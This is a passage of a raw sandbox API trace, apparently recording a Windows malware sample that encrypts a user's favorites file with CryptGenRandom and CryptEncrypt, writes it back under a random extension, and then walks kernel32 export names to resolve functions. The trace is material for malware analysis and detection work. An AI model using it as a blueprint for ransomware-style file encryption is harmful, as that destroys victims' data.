(in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN.url.0L2uJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ" [0185.670] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.670] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.0L2uJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.0l2uj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.670] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.670] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.670] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.671] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.671] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.671] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.671] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.671] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.672] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.672] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.672] CloseHandle (hObject=0x268) returned 1 [0185.672] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.672] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.673] CloseHandle (hObject=0x0) returned 0 [0185.673] CloseHandle (hObject=0x264) returned 1 [0185.673] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.673] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.674] GetTickCount () returned 0x1135a7f [0185.674] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.674] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.674] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.674] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.674] lstrlenA (lpString="kernel32.dll") returned 12 [0185.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.675] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.675] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.675] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.675] lstrlenA (lpString="ADDATOMA") returned 8 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.675] lstrlenA (lpString="ADDATOMW") returned 8 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.675] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.675] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.675] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.675] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.675] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.675] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.675] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.675] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.675] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.675] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.675] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.675] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.675] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.676] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.676] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.676] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.676] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.676] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.676] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.676] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.676] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.676] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.676] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.676] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.676] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.676] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.676] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.676] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.676] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.676] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.676] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.676] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.676] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.677] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.677] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.677] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.677] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.677] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.677] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.677] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.677] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.677] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.677] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.677] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.677] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.677] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.677] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.677] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.677] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.677] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.677] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.677] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.678] lstrlenA (lpString="BEEP") returned 4 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.678] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.678] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.678] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.678] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.678] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.678] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.678] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.678] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.678] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.678] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.678] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.678] lstrlenA (lpString="CANCELIO") returned 8 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.678] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.678] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.678] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.678] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.678] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.678] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.678] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.679] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.679] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.679] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.679] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.679] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.679] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.679] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.679] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.679] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.679] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.679] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.679] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.679] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.679] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.679] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.679] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.679] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.679] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.679] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.679] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.680] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.680] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.680] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.680] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.680] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.680] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.680] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.680] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.680] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.680] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.680] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.680] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.680] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.680] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.681] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" 